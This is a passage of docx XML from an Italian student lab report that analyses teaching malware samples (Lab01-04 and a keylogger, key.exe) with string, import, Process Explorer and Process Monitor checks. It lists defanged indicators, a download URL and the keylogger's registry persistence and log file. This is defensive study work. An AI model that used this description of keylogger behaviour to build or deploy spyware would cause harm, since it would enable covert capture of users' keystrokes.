      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3065378E" wp14:editId="29BF0FD6">
            <wp:extent cx="6574536" cy="2725986"/>
            <wp:effectExtent l="0" t="0" r="4445" b="5080"/>
            <wp:docPr id="647286177" name="Immagine 11" descr="Immagine che contiene testo, schermata, software, Pagina Web&#10;&#10;Descrizione generata automaticament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6177" name="Immagine 11" descr="Immagine che contiene testo, schermata, software, Pagina Web&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId170"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId171"/>
                    <a:srcRect l="8668" r="16337" b="40990"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6615355" cy="2742911"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFD1863" w14:textId="0A5D56AD" w:rsidR="00AC4D7D" w:rsidRDefault="00320B23" w:rsidP="00C76552">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Di </w:t>
      </w:r>
      <w:r w:rsidRPr="00320B23">
        <w:t>WS2_32.DLL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> notiamo le funzioni accept, bind, connect </w:t>
      </w:r>
      <w:r w:rsidR="00AC4D7D">
        <w:t xml:space="preserve">che presumibilmente vengono utilizzate per stabilire una connessione </w:t>
      </w:r>
      <w:r w:rsidR="001553E5">
        <w:t xml:space="preserve">creando una soket ed accettando la connessione </w:t>
      </w:r>
      <w:r w:rsidR="00AC4D7D">
        <w:t xml:space="preserve">con l’ip </w:t>
      </w:r>
      <w:r w:rsidR="0083388E">
        <w:t>127.26.152[.]13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A621E8" w14:textId="771DBE5B" w:rsidR="00AC4D7D" w:rsidRDefault="00AC4D7D" w:rsidP="00AC4D7D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B1C9328" wp14:editId="443EBF84">
            <wp:extent cx="5919614" cy="1133856"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="305299891" name="Immagine 12" descr="Immagine che contiene schermata, testo, software, Pagina Web&#10;&#10;Descrizione generata automaticament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9891" name="Immagine 12" descr="Immagine che contiene schermata, testo, software, Pagina Web&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId172"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId173"/>
                    <a:srcRect l="31508" r="13179" b="45670"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6000746" cy="1149396"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="353481F0" w14:textId="724A02A4" w:rsidR="00AC4D7D" w:rsidRDefault="00AC4D7D" w:rsidP="00AC4D7D">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Da Kernel32.dll viene utilizzata la funzione </w:t>
      </w:r>
      <w:r w:rsidR="00293B8F">
        <w:t>OpenMutexA presumibilmente per creare un semaforo in modo da non far eseguire contemporaneamente più volte lo stesso malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684A4523" w14:textId="77777777" w:rsidR="00293B8F" w:rsidRDefault="00293B8F" w:rsidP="00AC4D7D">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CC6A0E2" w14:textId="0B7E6303" w:rsidR="00066DA7" w:rsidRPr="00066DA7" w:rsidRDefault="00066DA7" w:rsidP="00770164">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc140165819"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>6.6 Extra Lab-01-04</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="46D23CF2" w14:textId="0946AEBD" w:rsidR="00066DA7" w:rsidRDefault="00770164" w:rsidP="00AC4D7D">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77AA30A2" wp14:editId="72F0267E">
            <wp:extent cx="6645910" cy="4234815"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1652101833" name="Immagine 13" descr="Immagine che contiene testo, schermata, software, Pagina Web&#10;&#10;Descrizione generata automaticament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01833" name="Immagine 13" descr="Immagine che contiene testo, schermata, software, Pagina Web&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId174"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId175"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="4234815"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="018C2A11" w14:textId="353B029E" w:rsidR="00FE2266" w:rsidRDefault="00FE2266" w:rsidP="00233602">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Il link dal quale scarica il malware è:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6FF7AD" w14:textId="492FA11F" w:rsidR="00233602" w:rsidRDefault="00000000" w:rsidP="00233602">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:hyperlink r:id="rId176" w:history="1">
        <w:r w:rsidR="00FE2266" w:rsidRPr="00C317BF">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t>http://www.practicalmalwareanalysis.com/updater[.]exe</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1E7D952C" w14:textId="24A82509" w:rsidR="00233602" w:rsidRDefault="00FE2266" w:rsidP="00233602">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il </w:t>
      </w:r>
      <w:r w:rsidR="002E6FD6">
        <w:t xml:space="preserve">nome del file è </w:t>
      </w:r>
      <w:r w:rsidR="00233602">
        <w:t>Updater.exe</w:t>
      </w:r>
      <w:r w:rsidR="002E6FD6">
        <w:t>, ma tale file non è più presente sul server e non è quindi</w:t>
      </w:r>
      <w:r w:rsidR="001B0DCD">
        <w:t xml:space="preserve"> non è possibile verificare la funzione importata da tale eseguibile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F4BB82" w14:textId="5BC39B65" w:rsidR="00233602" w:rsidRPr="0033273C" w:rsidRDefault="0033273C" w:rsidP="0033273C">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>La data in cui è stato compilato Lab01-04 è la seguente:</w:t>
      </w:r>
      <w:r w:rsidR="00233602">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00233602" w:rsidRPr="0033273C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2019-08-30 22:26:59 UTC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EE74B4" w14:textId="6964359D" w:rsidR="00A4686D" w:rsidRDefault="00A4686D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF463E1" w14:textId="32966D77" w:rsidR="00A4686D" w:rsidRDefault="00A4686D" w:rsidP="00A4686D">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc140165820"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>6.6 Keylogger</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="1AAD0445" w14:textId="69B48450" w:rsidR="00A4686D" w:rsidRPr="00A4686D" w:rsidRDefault="001D3B34" w:rsidP="00A4686D">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D44CE46" wp14:editId="29873424">
            <wp:extent cx="6400800" cy="4577900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1302740052" name="Immagine 14" descr="Immagine che contiene testo, software, Software multimediale, computer&#10;&#10;Descrizione generata automaticamente">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0052" name="Immagine 14" descr="Immagine che contiene testo, software, Software multimediale, computer&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId177"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId178"/>
                    <a:srcRect l="9081" t="3424" r="26667" b="14877"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6436102" cy="4603148"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4469C82A" w14:textId="0F14D5CC" w:rsidR="00770164" w:rsidRDefault="00AE556E" w:rsidP="00AC4D7D">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Analizzando le stringhe di key.exe notiamo </w:t>
      </w:r>
      <w:r w:rsidR="005E246E">
        <w:t xml:space="preserve">diverse stringhe sospette </w:t>
      </w:r>
      <w:r w:rsidR="00750314">
        <w:t>tra le quali log.txt</w:t>
      </w:r>
      <w:r w:rsidR="004A425B">
        <w:t xml:space="preserve"> che potrebbe raccogliere i log dell’utente, e </w:t>
      </w:r>
      <w:r w:rsidR="00B34014">
        <w:t>C:\Windows\vmx32to64.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D93FAC" w14:textId="66FFC247" w:rsidR="006B6136" w:rsidRDefault="00A375BE" w:rsidP="00AC4D7D">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Tra le funzioni sospette invece vediamo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F790F52" w14:textId="77777777" w:rsidR="00A375BE" w:rsidRDefault="00A375BE" w:rsidP="00A375BE">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>RegSetValueExA: questa funzione viene utilizzata per impostare un valore di registro. Un keylogger potrebbe utilizzarla per scrivere i dati dei tasti premuti all'interno del registro di sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E58A24" w14:textId="77777777" w:rsidR="00A375BE" w:rsidRDefault="00A375BE" w:rsidP="00A375BE">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>RegOpenKeyA e RegCloseKey: queste funzioni vengono utilizzate per aprire e chiudere una chiave di registro. Un keylogger potrebbe utilizzarle per accedere a specifiche chiavi di registro legate all'input della tastiera o alla registrazione dei dati.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB6105C" w14:textId="77777777" w:rsidR="00A375BE" w:rsidRDefault="00A375BE" w:rsidP="00A375BE">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>GetConsoleWindow: questa funzione restituisce l'handle della finestra della console attualmente attiva. Un keylogger potrebbe utilizzarla per ottenere l'handle della finestra della console in cui viene digitato l'input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB8AF44" w14:textId="11AD7A8D" w:rsidR="00A375BE" w:rsidRDefault="00A375BE" w:rsidP="00A375BE">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>CopyFileA: questa funzione viene utilizzata per copiare un file da una posizione all'altra. Un keylogger potrebbe utilizzarla per copiare i file di log contenenti le informazioni relative ai tasti premuti in una posizione specifica.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C97B9A" w14:textId="5EBDD294" w:rsidR="001210C1" w:rsidRPr="001210C1" w:rsidRDefault="001210C1" w:rsidP="001210C1">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc140165821"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">6.7 Process </w:t>
      </w:r>
      <w:r w:rsidR="00701657">
        <w:t>Explorer</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="2C1CFD27" w14:textId="37F641A5" w:rsidR="003E28A6" w:rsidRDefault="001210C1" w:rsidP="001210C1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D413905" wp14:editId="3641B4D2">
            <wp:extent cx="5763127" cy="1387011"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="1819331045" name="Immagine 15" descr="Immagine che contiene schermata, testo, software, Software multimediale&#10;&#10;Descrizione generata automaticamente">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1045" name="Immagine 15" descr="Immagine che contiene schermata, testo, software, Software multimediale&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId179"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId180"/>
                    <a:srcRect l="22574" t="65466" r="49594" b="22626"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5889232" cy="1417361"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A676E0" w14:textId="6126AF87" w:rsidR="00701657" w:rsidRDefault="00701657" w:rsidP="00701657">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Il nome dell’eseguibile è conhost.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334467C9" w14:textId="0D41A7A6" w:rsidR="00701657" w:rsidRDefault="00701657" w:rsidP="00701657">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc140165822"/>
      <w:r>
        <w:t>6.8 Process Monitor</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="0820B1D0" w14:textId="6F5B2F2A" w:rsidR="00701657" w:rsidRDefault="00D21CBE" w:rsidP="00701657">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="182D6222" wp14:editId="644339A7">
            <wp:extent cx="6283690" cy="1839074"/>
            <wp:effectExtent l="0" t="0" r="3175" b="2540"/>
            <wp:docPr id="317210847" name="Immagine 16" descr="Immagine che contiene testo, schermata, software, computer&#10;&#10;Descrizione generata automaticament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0847" name="Immagine 16" descr="Immagine che contiene testo, schermata, software, computer&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId181"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId182"/>
                    <a:srcRect r="48764" b="73341"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6360196" cy="1861465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="66ED0516" w14:textId="740CA042" w:rsidR="00D21CBE" w:rsidRDefault="007F7BBB" w:rsidP="00701657">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il malware crea e scrive nel file in </w:t>
      </w:r>
      <w:r w:rsidR="003E08CE" w:rsidRPr="003E08CE">
        <w:t>C:\Users\unina\Desktop\Labs\Labs\malware-basic\malware-basic\log.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF5953B" w14:textId="53D04770" w:rsidR="00996CA8" w:rsidRPr="00701657" w:rsidRDefault="00996CA8" w:rsidP="00701657">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Contenuto parziale del file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4738F536" w14:textId="049ECACF" w:rsidR="00701657" w:rsidRDefault="00473CED" w:rsidP="00701657">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AD7186D" wp14:editId="0207A15A">
            <wp:extent cx="6611395" cy="267128"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1288002145" name="Immagine 17" descr="Immagine che contiene testo, computer, schermata, schermo&#10;&#10;Descrizione generata automaticamente">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2145" name="Immagine 17" descr="Immagine che contiene testo, computer, schermata, schermo&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId183"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId184"/>
                    <a:srcRect l="5263" t="12375" r="48695" b="84317"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7043007" cy="284567"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E787C69" w14:textId="71F651EC" w:rsidR="00AC2497" w:rsidRDefault="00473CED" w:rsidP="00473CED">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1942"/>
        </w:tabs>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11B1B642" wp14:editId="79C59976">
            <wp:extent cx="6745506" cy="380143"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="1915607219" name="Immagine 1915607219" descr="Immagine che contiene testo, computer, schermata, schermo&#10;&#10;Descrizione generata automaticamente">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07219" name="Immagine 1915607219" descr="Immagine che contiene testo, computer, schermata, schermo&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId183"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId184"/>
                    <a:srcRect l="46809" t="12375" r="3887" b="82685"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7203692" cy="405964"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="365C77C8" w14:textId="1DD142B4" w:rsidR="00AC2497" w:rsidRDefault="00996CA8" w:rsidP="00701657">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FF8BDCA" wp14:editId="50103118">
            <wp:extent cx="6678202" cy="2334512"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="273673372" name="Immagine 18" descr="Immagine che contiene testo, software, Software multimediale, computer&#10;&#10;Descrizione generata automaticamente">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3372" name="Immagine 18" descr="Immagine che contiene testo, software, Software multimediale, computer&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId185"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId186"/>
                    <a:srcRect l="14591" t="48921" r="42951" b="24692"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6799386" cy="2376875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0943D618" w14:textId="77777777" w:rsidR="009F6807" w:rsidRDefault="00C35843" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="007A251B">
        <w:t>a key è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AC2497">
        <w:t>RegSetValue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC5EB60" w14:textId="1EC511AD" w:rsidR="00AC2497" w:rsidRDefault="009F6807" w:rsidP="00A7680F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FA01E9D" wp14:editId="2AC00CE6">
            <wp:extent cx="3729355" cy="1733107"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="1883321146" name="Immagine 1" descr="Immagine che contiene testo, schermata, software, Pagina Web&#10;&#10;Descrizione generata automaticament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1146" name="Immagine 1" descr="Immagine che contiene testo, schermata, software, Pagina Web&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId187"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId188"/>
                    <a:srcRect l="5721" t="14020" r="60579" b="58138"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3736880" cy="1736604"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CEF442" w14:textId="1C78A770" w:rsidR="00235FF0" w:rsidRDefault="00235FF0" w:rsidP="00235FF0">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc140165823"/>
      <w:r>
        <w:t>6.9 Persistenza</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w14:paraId="2CE3C2AE" w14:textId="142E850F" w:rsidR="00AC2497" w:rsidRDefault="00B508C0" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Dopo il riavvio del computer esaminiamo la persistenzaz con Process explorer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B049FB" w14:textId="6C264DD3" w:rsidR="00AC2497" w:rsidRDefault="00275FE8" w:rsidP="00235FF0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14848AD2" wp14:editId="32BDEB92">
            <wp:extent cx="6230679" cy="5523124"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1905"/>
            <wp:docPr id="1633039111" name="Immagine 2" descr="Immagine che contiene testo, software, Icona del computer, computer&#10;&#10;Descrizione generata automaticament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9111" name="Immagine 2" descr="Immagine che contiene testo, software, Icona del computer, computer&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId189"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
